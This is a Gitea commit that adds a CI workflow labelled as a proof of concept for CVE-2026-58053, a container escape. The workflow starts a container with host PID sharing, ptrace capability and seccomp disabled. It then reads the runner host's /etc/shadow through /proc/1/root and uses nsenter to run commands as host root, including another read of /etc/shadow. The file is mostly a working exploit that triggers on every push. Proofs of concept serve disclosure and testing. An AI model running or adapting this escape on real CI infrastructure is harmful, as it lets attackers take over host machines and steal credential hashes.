This commit is contained in:
21
.gitea/workflows/poc.yml
Normal file
21
.gitea/workflows/poc.yml
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
name: CVE-2026-58053-poc
|
||||||
|
on: [push, workflow_dispatch]
|
||||||
|
jobs:
|
||||||
|
escape:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
container:
|
||||||
|
image: ubuntu:22.04
|
||||||
|
options: --pid=host --cap-add=SYS_PTRACE --security-opt seccomp=unconfined
|
||||||
|
steps:
|
||||||
|
- name: escape
|
||||||
|
run: |
|
||||||
|
echo '[*] CVE-2026-58053 — container escape proof'
|
||||||
|
echo '[*] container pid ns:' $(readlink /proc/self/ns/pid)
|
||||||
|
echo '[*] host pid1 cmdline:' $(cat /proc/1/cmdline | tr '\0' ' ')
|
||||||
|
echo '[*] host hostname (proc):' $(cat /proc/1/root/etc/hostname 2>/dev/null)
|
||||||
|
echo '[*] host /etc/shadow (first 5 lines):'
|
||||||
|
cat /proc/1/root/etc/shadow 2>/dev/null | head -5
|
||||||
|
echo '[*] nsenter id (host root):'
|
||||||
|
nsenter -t 1 -m -u -i -n -p -- id 2>/dev/null
|
||||||
|
echo '[*] custom cmd: cat /etc/shadow'
|
||||||
|
nsenter -t 1 -m -u -i -n -p -- sh -c 'cat /etc/shadow' 2>/dev/null
|
||||||
Reference in New Issue
Block a user